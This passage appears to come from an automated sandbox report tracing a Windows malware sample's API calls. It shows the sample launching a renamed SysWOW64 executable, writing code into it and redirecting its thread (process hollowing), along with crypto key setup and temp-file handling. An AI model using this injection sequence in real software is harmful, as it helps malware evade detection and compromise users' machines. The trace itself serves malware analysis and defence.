dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x185ff2c | out: lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" /scomma \"C:\\Windows\\TEMP\\3256.tmp\"", lpProcessInformation=0x185ff2c*(hProcess=0x390, hThread=0x38c, dwProcessId=0x7e0, dwThreadId=0x7e4)) returned 1 [0249.603] VirtualQueryEx (in: hProcess=0x390, lpAddress=0x400000, lpBuffer=0x185fad8, dwLength=0x1c | out: lpBuffer=0x185fad8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0249.603] VirtualProtectEx (in: hProcess=0x390, lpAddress=0x400000, dwSize=0x1c000, flNewProtect=0x40, lpflOldProtect=0x185faf4 | out: lpflOldProtect=0x185faf4*=0x2) returned 1 [0249.604] GetThreadContext (in: hThread=0x38c, lpContext=0x185f80c | out: lpContext=0x185f80c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0249.800] IsWow64Process (in: hProcess=0x390, Wow64Process=0x185faf8 | out: Wow64Process=0x185faf8) returned 1 [0249.800] WriteProcessMemory (in: hProcess=0x390, lpBaseAddress=0x400000, lpBuffer=0x12a0000*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x12a0000*, lpNumberOfBytesWritten=0x0) returned 1 [0249.812] WriteProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffde008, lpBuffer=0x185fafc*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x185fafc*, lpNumberOfBytesWritten=0x0) returned 1 [0249.812] WriteProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffdf010, lpBuffer=0x185fafc*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x185fafc*, lpNumberOfBytesWritten=0x0) returned 1 [0249.813] SetThreadContext (hThread=0x38c, lpContext=0x185f80c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x41211a, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0249.888] ResumeThread (hThread=0x38c) returned 0x1 [0249.888] WaitForSingleObject (hHandle=0x390, dwMilliseconds=0xea60) returned 0x0 [0264.436] TerminateProcess (hProcess=0x390, uExitCode=0x0) returned 0 [0264.436] CloseHandle (hObject=0x390) returned 1 [0264.436] CloseHandle (hObject=0x38c) returned 1 [0264.436] CloseHandle (hObject=0x0) returned 0 [0264.436] VirtualFree (lpAddress=0x12a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.437] CreateFileW (lpFileName="C:\\Windows\\TEMP\\3256.tmp" (normalized: "c:\\windows\\temp\\3256.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0264.437] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0264.437] CloseHandle (hObject=0x38c) returned 1 [0264.437] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\3256.tmp" (normalized: "c:\\windows\\temp\\3256.tmp")) returned 1 [0264.438] CryptDestroyHash (hHash=0x5132e8) returned 1 [0264.438] CryptDestroyKey (hKey=0x5138a8) returned 1 [0264.438] CryptDestroyKey (hKey=0x5139e8) returned 1 [0264.438] CryptReleaseContext (hProv=0x5066b0, dwFlags=0x0) returned 1 [0264.438] FreeLibrary (hLibModule=0x760f0000) returned 1 [0264.438] FreeLibrary (hLibModule=0x77130000) returned 1 [0264.438] FreeLibrary (hLibModule=0x74790000) returned 1 [0264.438] FreeLibrary (hLibModule=0x74450000) returned 1 [0264.438] FreeLibrary (hLibModule=0x74160000) returned 1 [0264.438] FreeLibrary (hLibModule=0x73f30000) returned 1 [0264.438] FreeLibrary (hLibModule=0x73f20000) returned 1 [0264.438] CloseHandle (hObject=0x380) returned 1 Thread: id = 509 os_tid = 0x7cc [0249.589] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0249.589] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0249.590] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x77130000 [0249.590] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x74790000 [0249.590] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x74450000 [0249.591] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74160000 [0249.591] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x73f30000 [0249.591] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x73f20000 [0249.592] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x1487f50 | out: lpBuffer="C:\\Windows\\TEMP\\") returned 0x10 [0249.592] GetTempFileNameW (in: lpPathName="C:\\Windows\\TEMP\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x1487f50 | out: lpTempFileName="C:\\Windows\\TEMP\\3267.tmp" (normalized: "c:\\windows\\temp\\3267.tmp")) returned 0x3267 [0249.592] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\3267.tmp" (normalized: "c:\\windows\\temp\\3267.tmp")) returned 1 [0249.593] CryptAcquireContextW (in: phProv=0x1488180, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x1488180*=0x52ecc0) returned 1 [0249.593] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x413430, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x195ff14, pcbStructInfo=0x195ff10 | out: pvStructInfo=0x195ff14, pcbStructInfo=0x195ff10) returned 1 [0249.593] CryptImportKey (in: hProv=0x52ecc0, pbData=0x502488, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x1488184 | out: phKey=0x1488184*=0x513a28) returned 1 [0249.593] LocalFree (hMem=0x502488) returned 0x0 [0249.593] CryptGenKey (in: hProv=0x52ecc0, Algid=0x660e, dwFlags=0x1, phKey=0x1488188 | out: phKey=0x1488188*=0x5137e8) returned 1 [0249.593] CryptCreateHash (in: hProv=0x52ecc0, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x148818c | out: phHash=0x148818c) returned 1 [0249.593] VirtualAlloc (lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x14d0000 [0249.596] WTSGetActiveConsoleSessionId () returned 0x1 [0249.596] QueryUserToken () returned 0x0 [0249.596] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x195fd08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0249.596] _snwprintf (in: _Dest=0x195fb00, _Count=0x104, _Format="\"%s\" \"%s\"" | out: _Dest="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"") returned 67 [0249.597] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x404, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x195fa94*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x195ff14 | out: lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"", lpProcessInformation=0x195ff14*(hProcess=0x3b4, hThread=0x3b0, dwProcessId=0x7e8, dwThreadId=0x7ec)) returned 1 [0249.775] VirtualQueryEx (in: hProcess=0x3b4, lpAddress=0x400000, lpBuffer=0x195fac0, dwLength=0x1c | out: lpBuffer=0x195fac0*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0249.775] VirtualProtectEx (in: hProcess=0x3b4, lpAddress=0x400000, dwSize=0x1c000, flNewProtect=0x40, lpflOldProtect=0x195fadc | out: lpflOldProtect=0x195fadc*=0x2) returned 1 [0249.776] GetThreadContext (in: hThread=0x3b0, lpContext=0x195f7f4 | out: lpContext=0x195f7f4*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, 